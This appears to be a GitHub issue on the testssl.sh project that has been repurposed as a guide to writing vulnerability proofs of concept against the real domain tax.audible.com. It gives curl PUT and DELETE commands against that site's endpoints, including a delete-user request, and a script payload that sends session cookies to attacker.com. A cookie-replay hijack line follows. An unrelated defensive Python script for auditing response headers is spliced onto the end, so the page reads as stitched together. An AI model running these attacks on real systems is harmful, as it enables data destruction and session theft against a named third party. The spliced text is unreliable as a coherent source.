testssl/testssl.sh

[BUG / possible BUG]

Closed this issue · 1 comments

Create a Repository:

Log in to your GitHub account.

Create a new repository (you can name it something like "Vulnerability-PoCs" or related to the domain you're testing).

    Go to your GitHub homepage and click the "New" button under your repositories.

    Name the repository and provide a description. Make it public or private based on your preference.

    Initialize the repository with a README file (optional).

Structure the Repository:

README.md: Provide an overview of your repository, explain what the repository contains (PoCs), and mention the potential security risks.

PoC Folder: Create folders to organize the PoCs based on vulnerabilities or domain.
Example:

Vulnerability-PoCs/
├── README.md
├── PUT-DELETE-PATCH-Vulnerability/
│   └── poc-put-delete-patch.md
├── Session-Cookie-Vulnerability/
│   └── poc-session-cookie.md
└── report.txt

Write PoC Documentation:
For each vulnerability, create a markdown file with the following structure:

Example for PoC on PUT/DELETE/PATCH Methods:

File Path: Vulnerability-PoCs/PUT-DELETE-PATCH-Vulnerability/poc-put-delete-patch.md

PoC for PUT, DELETE, PATCH Methods

Vulnerability

The server exposes potentially risky HTTP methods (PUT, PATCH, DELETE) that can allow unauthorized users to modify or delete resources.

Steps to Reproduce

  1. Identify vulnerable endpoints:

    • Use Nmap or Burp Suite to scan for methods allowed on the server.
    • Example Nmap output shows PUT, PATCH, and DELETE allowed:
      | http-methods: 
      |_  Potentially risky methods: PUT PATCH DELETE
      
  2. Use curl to test vulnerable methods:

    • Example of testing the PUT method:
      curl -X PUT https://tax.audible.com/some-endpoint -d "data=test"

  3. Exploit the vulnerability:

    • Test with DELETE or PATCH to modify or delete server data.
    • Example DELETE command:
      curl -X DELETE https://tax.audible.com/api/delete-user?id=12345

Expected Impact

Unauthorized modification or deletion of server resources.

Example for PoC on Missing HttpOnly Flag:

File Path: Vulnerability-PoCs/Session-Cookie-Vulnerability/poc-session-cookie.md

PoC for Missing HttpOnly Flag on Session Cookie

Vulnerability

The session cookie does not have the HttpOnly flag set, making it vulnerable to theft via JavaScript-based attacks (XSS).

Steps to Reproduce

  1. Inspect cookies:

    • Open the browser's Developer Tools and check cookies under the Application tab.
    • Look for the session-id cookie and verify that the HttpOnly flag is not set.

  2. Test XSS:

    • Use an XSS payload to steal the session ID.
    • Example payload:
      <script>document.location='http://attacker.com/steal-cookie?cookie=' + document.cookie;</script>

  3. Session Hijacking:

    • After stealing the cookie, use it to hijack the session:
      curl -X GET https://tax.audible.com/ -H "Cookie: session-id=abcd1234"

Expected Impact

Session hijacking, unauthorized access to user data.

git add .
git commit -m "Added PoCs for risky HTTP methods and session cookie vulnerability"
git push origin main

Repository Name: Vulnerability-PoCs

Vulnerability PoCs

This repository contains proof of concept (PoC) submissions for security vulnerabilities found on the tax.audible.com domain.

PoCs
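The two findings the post documents (risky methods advertised by the server and a session cookie set without HttpOnly) can both be triaged from a single captured response before anything is written up. The following checker is an added example, not code from the issue or from the testssl.sh project; the function names and the sample response are assumptions constructed for illustration and do not come from any real host. It parses raw response headers, reports PUT/PATCH/DELETE in an `Allow` header (what Nmap's http-methods script derives from an OPTIONS reply), and lists the HttpOnly, Secure and SameSite attributes missing from a named session cookie.

```python
"""Audit a captured HTTP response for risky methods advertised in Allow and
for a session cookie issued without HttpOnly/Secure/SameSite.

Added example: hypothetical helper names; SAMPLE_RESPONSE is constructed,
not captured from any real server."""
from __future__ import annotations

RISKY_METHODS = {"PUT", "PATCH", "DELETE"}
WANTED_COOKIE_FLAGS = ("HttpOnly", "Secure", "SameSite")

# Constructed OPTIONS response from a hypothetical application.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: GET, HEAD, OPTIONS, PUT, PATCH, DELETE\r\n"
    "Set-Cookie: session-id=abcd1234; Path=/\r\n"
    "Set-Cookie: lang=en; Path=/; HttpOnly; Secure; SameSite=Lax\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> list[tuple[str, str]]:
    """Split a raw response into (name, value) pairs, keeping order and duplicates."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")[1:]  # drop the status line
    headers = []
    for line in lines:
        if not line or ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip(), value.strip()))
    return headers


def risky_methods_allowed(allow_value: str) -> set[str]:
    """Return the risky methods advertised in an Allow header value."""
    methods = {m.strip().upper() for m in allow_value.split(",") if m.strip()}
    return methods & RISKY_METHODS


def missing_cookie_flags(set_cookie_value: str) -> tuple[str, list[str]]:
    """Return (cookie name, flags absent from the Set-Cookie attributes)."""
    parts = [p.strip() for p in set_cookie_value.split(";")]
    name = parts[0].split("=", 1)[0]
    # Attribute names are case-insensitive; SameSite carries a value, the others do not.
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    missing = [f for f in WANTED_COOKIE_FLAGS if f.lower() not in attrs]
    return name, missing


def audit_response(raw: str, session_cookie_names=("session-id",)) -> list[str]:
    """Collect human-readable findings for the two checks above."""
    findings = []
    for name, value in parse_headers(raw):
        lname = name.lower()
        if lname == "allow":
            risky = risky_methods_allowed(value)
            if risky:
                findings.append("risky methods advertised: " + ", ".join(sorted(risky)))
        elif lname == "set-cookie":
            cname, missing = missing_cookie_flags(value)
            if cname in session_cookie_names and missing:
                findings.append(f"cookie {cname} missing: " + ", ".join(missing))
    return findings


if __name__ == "__main__":
    for finding in audit_response(SAMPLE_RESPONSE):
        print(finding)
```

An `Allow` header only states what the server advertises; whether PUT, PATCH or DELETE actually succeed without authorization is decided by server-side access control, so treat this output as a triage signal that still needs confirmation on an endpoint you are authorized to test, and as a fix list (restrict the methods, add HttpOnly/Secure/SameSite) on the defending side.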